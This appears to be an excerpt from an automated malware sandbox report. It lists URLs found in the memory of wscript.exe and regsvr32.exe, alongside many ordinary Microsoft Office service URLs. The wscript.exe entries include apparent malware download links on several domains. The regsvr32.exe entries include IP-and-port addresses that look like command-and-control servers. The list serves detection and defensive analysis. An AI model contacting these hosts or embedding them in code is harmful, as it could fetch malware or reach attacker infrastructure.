                      Source: wscript.exe, wscript.exe, 0000000A.00000003.330847371.00000000056DF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.322100825.0000000003144000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.322645365.0000000003155000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.344745583.00000000058AD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.337313422.0000000005744000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.342708876.00000000059CA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.322847815.00000000054CC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.326801237.0000000005634000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.338014763.0000000005799000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.349049882.0000000005A20000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.340897230.00000000058AD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.341340667.00000000058D5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.337313422.0000000005784000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.342086843.0000000005957000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.321369309.000000000311D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.325136624.0000000005507000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.330151704.0000000005654000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.342624531.00000000059C0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.324592475.000000000556E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.330572608.00000000056E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ozmeydan.com/cekici/9/
                      Source: wscript.exe, 0000000A.00000003.342822550.0000000005200000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ozmeydan.com/cekici/9/xM
                      Source: wscript.exe, 0000000A.00000003.341234990.00000000058C4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.326264766.00000000055E8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.327332370.0000000005691000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.324690932.000000000554B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.342738021.00000000059E7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.324138518.000000000552F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.348155400.00000000055CD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.323566431.0000000005568000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.342349723.0000000005957000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.330151704.000000000561B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.344745583.0000000005894000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.341386251.00000000058EC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.331489466.000000000571C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.330745932.000000000574C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.325159441.0000000003100000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.329876952.000000000564C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.331489466.0000000005730000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.337214999.0000000005730000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.326999840.00000000055E1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.323811413.0000000003150000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.329739931.00000000055CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://softwareulike.com/cWIYxWMPkK/
                      Source: wscript.exe, 0000000A.00000003.342822550.0000000005200000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://softwareulike.com/cWIYxWMPkK/yM
                      Source: D0161517-DEC8-4879-886E-56C64A97E450.0.drString found in binary or memory: http://weather.service.msn.com/data.aspx
                      Source: wscript.exe, 0000000A.00000003.343758440.0000000005640000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://wrappixels.com/wp-admin/GdIA2oOQEi
                      Source: wscript.exe, 0000000A.00000003.342624531.00000000059C0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.324592475.000000000556E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.330572608.00000000056E6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.325349096.00000000055B0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.322597416.00000000054F3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.330847371.00000000056CB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.329589851.0000000005669000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.325953256.00000000055C6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.324690932.0000000005518000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.341234990.00000000058C4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.326264766.00000000055E8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.327332370.0000000005691000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.324690932.000000000554B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.342738021.00000000059E7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.324138518.000000000552F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.348155400.00000000055CD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.323566431.0000000005568000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.342349723.0000000005957000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.330151704.000000000561B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.344745583.0000000005894000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.331489466.000000000571C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://wrappixels.com/wp-admin/GdIA2oOQEiO5G/
                      Source: wscript.exe, 0000000A.00000003.342822550.00000000051FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://wrappixels.com/wp-admin/GdIA2oOQEiO5G/0
                      Source: wscript.exe, 0000000A.00000003.342822550.0000000005200000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://wrappixels.com/wp-admin/GdIA2oOQEiO5G/zM
                      Source: regsvr32.exe, 0000000D.00000003.532477535.0000000000A52000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000D.00000003.533737252.0000000000A5F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://104.168.155.143:8080/
                      Source: regsvr32.exe, 0000000D.00000003.533810298.0000000000A16000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000D.00000002.561180722.0000000000A17000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://104.168.155.143:8080/acfnurik/pjkp/
                      Source: regsvr32.exe, 0000000D.00000003.533737252.0000000000A9C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000D.00000003.532477535.0000000000A9C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://104.168.155.143:8080/l
                      Source: regsvr32.exe, 0000000D.00000002.561463201.0000000000A9C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://159.65.88.10:8080/
                      Source: regsvr32.exe, 0000000D.00000002.561463201.0000000000A9C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://159.65.88.10:8080/.
                      Source: regsvr32.exe, 0000000D.00000002.561463201.0000000000AB3000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000D.00000002.561463201.0000000000A9C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://159.65.88.10:8080/acfnurik/pjkp/
                      Source: regsvr32.exe, 0000000D.00000002.561463201.0000000000A9C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://159.65.88.10:8080/acfnurik/pjkp//
                      Source: regsvr32.exe, 0000000D.00000002.561463201.0000000000A9C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://159.65.88.10:8080/v
                      Source: regsvr32.exe, 0000000D.00000002.561840669.0000000002A3A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000D.00000002.561463201.0000000000A60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://159.89.202.34/acfnurik/pjkp/
                      Source: regsvr32.exe, 0000000D.00000002.561180722.0000000000A1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://159.89.202.34/acfnurik/pjkp/G
                      Source: regsvr32.exe, 0000000D.00000002.561463201.0000000000A60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://159.89.202.34/acfnurik/pjkp/o6Hhr
                      Source: regsvr32.exe, 0000000D.00000003.533737252.0000000000A9C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000D.00000002.561180722.0000000000A1B000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000D.00000003.533810298.0000000000A1B000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000D.00000003.532477535.0000000000A9C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://160.16.142.56:8080/
                      Source: regsvr32.exe, 0000000D.00000003.533737252.0000000000A9C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000D.00000003.532477535.0000000000A9C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://160.16.142.56:8080/.
                      Source: regsvr32.exe, 0000000D.00000003.533737252.0000000000A9C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000D.00000002.561463201.0000000000A9C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000D.00000003.532477535.0000000000A9C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://160.16.142.56:8080/F
                      Source: regsvr32.exe, 0000000D.00000003.532477535.0000000000A52000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000D.00000003.533737252.0000000000A9C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000D.00000003.533737252.0000000000A5F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000D.00000003.532477535.0000000000AB3000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000D.00000003.532477535.0000000000A9C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://160.16.142.56:8080/acfnurik/pjkp/
                      Source: regsvr32.exe, 0000000D.00000003.533737252.0000000000A9C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000D.00000003.532477535.0000000000A9C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://160.16.142.56:8080/r
                      Source: regsvr32.exe, 0000000D.00000003.533737252.0000000000A9C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000D.00000003.532477535.0000000000A9C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://163.44.196.120:8080/L
                      Source: regsvr32.exe, 0000000D.00000003.533737252.0000000000A9C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000D.00000003.532477535.0000000000A9C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://163.44.196.120:8080/acfnurik/pjkp/
                      Source: regsvr32.exe, 0000000D.00000003.533737252.0000000000A9C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000D.00000003.532477535.0000000000A9C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://163.44.196.120:8080/acfnurik/pjkp/2
                      Source: regsvr32.exe, 0000000D.00000003.533737252.0000000000A9C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000D.00000003.532477535.0000000000A9C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://163.44.196.120:8080/l
                      Source: regsvr32.exe, 0000000D.00000003.533737252.0000000000A9C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000D.00000002.561463201.0000000000A9C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000D.00000003.532477535.0000000000A9C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://164.90.222.65/V
                      Source: regsvr32.exe, 0000000D.00000002.561840669.0000000002A3A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://164.90.222.65/acfnurik/pjkp/-
                      Source: regsvr32.exe, 0000000D.00000002.561896576.0000000002BD0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://169.65.88.10:8080/
                      Source: regsvr32.exe, 0000000D.00000002.561180722.0000000000A52000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000D.00000003.532477535.0000000000A52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://187.63.160.88:80/acfnurik/pjkp/q
                      Source: regsvr32.exe, 0000000D.00000003.533737252.0000000000A9C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000D.00000003.532477535.0000000000A9C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://66.228.32.31:7080/
                      Source: regsvr32.exe, 0000000D.00000002.560675790.00000000009C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://91.121.146.47:8080/
                      Source: regsvr32.exe, 0000000D.00000003.532477535.0000000000A3D000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000D.00000002.561180722.0000000000A3F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://91.121.146.47:8080/acfnubbnr
                      Source: regsvr32.exe, 0000000D.00000002.560675790.00000000009C8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000D.00000003.400278720.0000000000A3D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://91.121.146.47:8080/acfnurik/pjkp/
                      Source: D0161517-DEC8-4879-886E-56C64A97E450.0.drString found in binary or memory: https://addinsinstallation.store.office.com/app/acquisitionlogging
                      Source: D0161517-DEC8-4879-886E-56C64A97E450.0.drString found in binary or memory: https://addinsinstallation.store.office.com/app/download
                      Source: D0161517-DEC8-4879-886E-56C64A97E450.0.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/authenticated
                      Source: D0161517-DEC8-4879-886E-56C64A97E450.0.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/preinstalled
                      Source: D0161517-DEC8-4879-886E-56C64A97E450.0.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/unauthenticated
                      Source: D0161517-DEC8-4879-886E-56C64A97E450.0.drString found in binary or memory: https://addinsinstallation.store.office.com/orgid/appinstall/authenticated
                      Source: D0161517-DEC8-4879-886E-56C64A97E450.0.drString found in binary or memory: https://addinslicensing.store.office.com/apps/remove
                      Source: D0161517-DEC8-4879-886E-56C64A97E450.0.drString found in binary or memory: https://addinslicensing.store.office.com/commerce/query
                      Source: D0161517-DEC8-4879-886E-56C64A97E450.0.drString found in binary or memory: https://addinslicensing.store.office.com/entitlement/query
                      Source: D0161517-DEC8-4879-886E-56C64A97E450.0.drString found in binary or memory: https://addinslicensing.store.office.com/orgid/apps/remove
                      Source: D0161517-DEC8-4879-886E-56C64A97E450.0.drString found in binary or memory: https://addinslicensing.store.office.com/orgid/entitlement/query
                      Source: D0161517-DEC8-4879-886E-56C64A97E450.0.drString found in binary or memory: https://analysis.windows.net/powerbi/api
                      Source: D0161517-DEC8-4879-886E-56C64A97E450.0.drString found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
                      Source: D0161517-DEC8-4879-886E-56C64A97E450.0.drString found in binary or memory: https://api.aadrm.com
                      Source: D0161517-DEC8-4879-886E-56C64A97E450.0.drString found in binary or memory: https://api.aadrm.com/
                      Source: D0161517-DEC8-4879-886E-56C64A97E450.0.drString found in binary or memory: https://api.addins.omex.office.net/appinfo/query
                      Source: D0161517-DEC8-4879-886E-56C64A97E450.0.drString found in binary or memory: https://api.addins.omex.office.net/appstate/query
                      Source: D0161517-DEC8-4879-886E-56C64A97E450.0.drString found in binary or memory: https://api.addins.store.office.com/addinstemplate
                      Source: D0161517-DEC8-4879-886E-56C64A97E450.0.drString found in binary or memory: https://api.addins.store.office.com/app/query
                      Source: D0161517-DEC8-4879-886E-56C64A97E450.0.drString found in binary or memory: https://api.addins.store.officeppe.com/addinstemplate
                      Source: D0161517-DEC8-4879-886E-56C64A97E450.0.drString found in binary or memory: https://api.cortana.ai
                      Source: D0161517-DEC8-4879-886E-56C64A97E450.0.drString found in binary or memory: https://api.diagnostics.office.com
                      Source: D0161517-DEC8-4879-886E-56C64A97E450.0.drString found in binary or memory: https://api.diagnosticssdf.office.com
                      Source: D0161517-DEC8-4879-886E-56C64A97E450.0.drString found in binary or memory: https://api.diagnosticssdf.office.com/v2/feedback
                      Source: D0161517-DEC8-4879-886E-56C64A97E450.0.drString found in binary or memory: https://api.diagnosticssdf.office.com/v2/file
                      Source: D0161517-DEC8-4879-886E-56C64A97E450.0.drString found in binary or memory: https://api.microsoftstream.com/api/
                      Source: D0161517-DEC8-4879-886E-56C64A97E450.0.drString found in binary or memory: https://api.office.net
                      Source: D0161517-DEC8-4879-886E-56C64A97E450.0.drString found in binary or memory: https://api.onedrive.com
                      Source: D0161517-DEC8-4879-886E-56C64A97E450.0.drString found in binary or memory: https://api.powerbi.com/beta/myorg/imports
                      Source: D0161517-DEC8-4879-886E-56C64A97E450.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
                      Source: D0161517-DEC8-4879-886E-56C64A97E450.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
                      Source: D0161517-DEC8-4879-886E-56C64A97E450.0.drString found in binary or memory: https://api.scheduler.
                      Source: D0161517-DEC8-4879-886E-56C64A97E450.0.drString found in binary or memory: https://apis.live.net/v5.0/
                      Source: D0161517-DEC8-4879-886E-56C64A97E450.0.drString found in binary or memory: https://arc.msn.com/v4/api/selection
                      Source: D0161517-DEC8-4879-886E-56C64A97E450.0.drString found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
                      Source: D0161517-DEC8-4879-886E-56C64A97E450.0.drString found in binary or memory: https://augloop.office.com
                      Source: D0161517-DEC8-4879-886E-56C64A97E450.0.drString found in binary or memory: https://augloop.office.com/v2
                      Source: D0161517-DEC8-4879-886E-56C64A97E450.0.drString found in binary or memory: https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h
                      Source: D0161517-DEC8-4879-886E-56C64A97E450.0.drString found in binary or memory: https://autodiscover-s.outlook.com/
                      Source: D0161517-DEC8-4879-886E-56C64A97E450.0.drString found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
                      Source: wscript.exe, wscript.exe, 0000000A.00000003.330847371.00000000056DF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.322100825.0000000003144000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.322645365.0000000003155000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.344745583.00000000058AD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.337313422.0000000005744000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.342708876.00000000059CA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.322847815.00000000054CC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.326801237.0000000005634000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.338014763.0000000005799000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.349049882.0000000005A20000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.340897230.00000000058AD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.341340667.00000000058D5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.337313422.0000000005784000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.342086843.0000000005957000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.321369309.000000000311D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.325136624.0000000005507000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.330151704.0000000005654000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.342624531.00000000059C0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.324592475.000000000556E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.330572608.00000000056E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bbvoyage.com/useragreement/ElKHvb4QIQqSrh6Hqm/
                      Source: wscript.exe, 0000000A.00000003.342822550.0000000005200000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bbvoyage.com/useragreement/ElKHvb4QIQqSrh6Hqm/uM
                      Source: D0161517-DEC8-4879-886E-56C64A97E450.0.drString found in binary or memory: https://cdn.entity.
                      Source: D0161517-DEC8-4879-886E-56C64A97E450.0.drString found in binary or memory: https://cdn.hubblecontent.osi.office.net/
                      Source: D0161517-DEC8-4879-886E-56C64A97E450.0.drString found in binary or memory: https://cdn.int.designerapp.osi.office.net/fonts
                      Source: D0161517-DEC8-4879-886E-56C64A97E450.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
                      Source: D0161517-DEC8-4879-886E-56C64A97E450.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
                      Source: D0161517-DEC8-4879-886E-56C64A97E450.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
                      Source: D0161517-DEC8-4879-886E-56C64A97E450.0.drString found in binary or memory: https://client-office365-tas.msedge.net/ab
                      Source: D0161517-DEC8-4879-886E-56C64A97E450.0.drString found in binary or memory: https://clients.config.office.net/
                      Source: D0161517-DEC8-4879-886E-56C64A97E450.0.drString found in binary or memory: https://clients.config.office.net/c2r/v1.0/InteractiveInstallation
                      Source: D0161517-DEC8-4879-886E-56C64A97E450.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
                      Source: D0161517-DEC8-4879-886E-56C64A97E450.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/ios
                      Source: D0161517-DEC8-4879-886E-56C64A97E450.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/mac
                      Source: D0161517-DEC8-4879-886E-56C64A97E450.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
                      Source: D0161517-DEC8-4879-886E-56C64A97E450.0.drString found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
                      Source: D0161517-DEC8-4879-886E-56C64A97E450.0.drString found in binary or memory: https://config.edge.skype.com
                      Source: D0161517-DEC8-4879-886E-56C64A97E450.0.drString found in binary or memory: https://config.edge.skype.com/config/v1/Office
                      Source: D0161517-DEC8-4879-886E-56C64A97E450.0.drString found in binary or memory: https://config.edge.skype.com/config/v2/Office
                      Source: D0161517-DEC8-4879-886E-56C64A97E450.0.drString found in binary or memory: https://consent.config.office.com/consentcheckin/v1.0/consents
                      Source: D0161517-DEC8-4879-886E-56C64A97E450.0.drString found in binary or memory: https://consent.config.office.com/consentweb/v1.0/consents
                      Source: D0161517-DEC8-4879-886E-56C64A97E450.0.drString found in binary or memory: https://cortana.ai
                      Source: D0161517-DEC8-4879-886E-56C64A97E450.0.drString found in binary or memory: https://cortana.ai/api
                      Source: D0161517-DEC8-4879-886E-56C64A97E450.0.drString found in binary or memory: https://cr.office.com
                      Source: D0161517-DEC8-4879-886E-56C64A97E450.0.drString found in binary or memory: https://d.docs.live.net
                      Source: D0161517-DEC8-4879-886E-56C64A97E450.0.drString found in binary or memory: https://dataservice.o365filtering.com
                      Source: D0161517-DEC8-4879-886E-56C64A97E450.0.drString found in binary or memory: https://dataservice.o365filtering.com/
                      Source: D0161517-DEC8-4879-886E-56C64A97E450.0.drString found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
                      Source: D0161517-DEC8-4879-886E-56C64A97E450.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
                      Source: D0161517-DEC8-4879-886E-56C64A97E450.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
                      Source: D0161517-DEC8-4879-886E-56C64A97E450.0.drString found in binary or memory: https://designerapp.officeapps.live.com/designerapp
                      Source: D0161517-DEC8-4879-886E-56C64A97E450.0.drString found in binary or memory: https://dev.cortana.ai
                      Source: D0161517-DEC8-4879-886E-56C64A97E450.0.drString found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
                      Source: D0161517-DEC8-4879-886E-56C64A97E450.0.drString found in binary or memory: https://dev0-api.acompli.net/autodetect
                      Source: D0161517-DEC8-4879-886E-56C64A97E450.0.drString found in binary or memory: https://devnull.onenote.com
                      Source: D0161517-DEC8-4879-886E-56C64A97E450.0.drString found in binary or memory: https://directory.services.
                      Source: D0161517-DEC8-4879-886E-56C64A97E450.0.drString found in binary or memory: https://ecs.office.com/config/v1/Designer
                      Source: D0161517-DEC8-4879-886E-56C64A97E450.0.drString found in binary or memory: https://ecs.office.com/config/v2/Office
                      Source: D0161517-DEC8-4879-886E-56C64A97E450.0.drString found in binary or memory: https://enrichment.osi.office.net/
                      Source: D0161517-DEC8-4879-886E-56C64A97E450.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Refresh/v1
                      Source: D0161517-DEC8-4879-886E-56C64A97E450.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Resolve/v1
                      Source: D0161517-DEC8-4879-886E-56C64A97E450.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Search/v1
                      Source: D0161517-DEC8-4879-886E-56C64A97E450.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/StockHistory/v1
                      Source: D0161517-DEC8-4879-886E-56C64A97E450.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/ipcheck/v1
                      Source: D0161517-DEC8-4879-886E-56C64A97E450.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/
                      Source: D0161517-DEC8-4879-886E-56C64A97E450.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/metadata.json
                      Source: D0161517-DEC8-4879-886E-56C64A97E450.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/desktop/main.cshtml
                      Source: D0161517-DEC8-4879-886E-56C64A97E450.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/web/main.cshtml
                      Source: D0161517-DEC8-4879-886E-56C64A97E450.0.drString found in binary or memory: https://entitlement.diagnostics.office.com
                      Source: D0161517-DEC8-4879-886E-56C64A97E450.0.drString found in binary or memory: https://entitlement.diagnosticssdf.office.com
                      Source: D0161517-DEC8-4879-886E-56C64A97E450.0.drString found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
                      Source: D0161517-DEC8-4879-886E-56C64A97E450.0.drString found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
                      Source: D0161517-DEC8-4879-886E-56C64A97E450.0.drString found in binary or memory: https://globaldisco.crm.dynamics.com
                      Source: D0161517-DEC8-4879-886E-56C64A97E450.0.drString found in binary or memory: https://graph.ppe.windows.net
                      Source: D0161517-DEC8-4879-886E-56C64A97E450.0.drString found in binary or memory: https://graph.ppe.windows.net/
                      Source: D0161517-DEC8-4879-886E-56C64A97E450.0.drString found in binary or memory: https://graph.windows.net
                      Source: D0161517-DEC8-4879-886E-56C64A97E450.0.drString found in binary or memory: https://graph.windows.net/
                      Source: D0161517-DEC8-4879-886E-56C64A97E450.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/pivots/
                      Source: D0161517-DEC8-4879-886E-56C64A97E450.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
                      Source: D0161517-DEC8-4879-886E-56C64A97E450.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
                      Source: D0161517-DEC8-4879-886E-56C64A97E450.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?secureurl=1
                      Source: D0161517-DEC8-4879-886E-56C64A97E450.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
